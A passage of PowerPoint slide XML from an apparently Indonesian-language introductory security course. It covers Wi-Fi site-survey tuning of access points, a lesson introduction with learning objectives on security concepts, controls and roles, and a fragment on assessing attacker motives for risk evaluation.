              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hijau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumpang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pancar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada WAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3986202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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlangsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meringkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, unit, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembelajaran</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3568263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Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
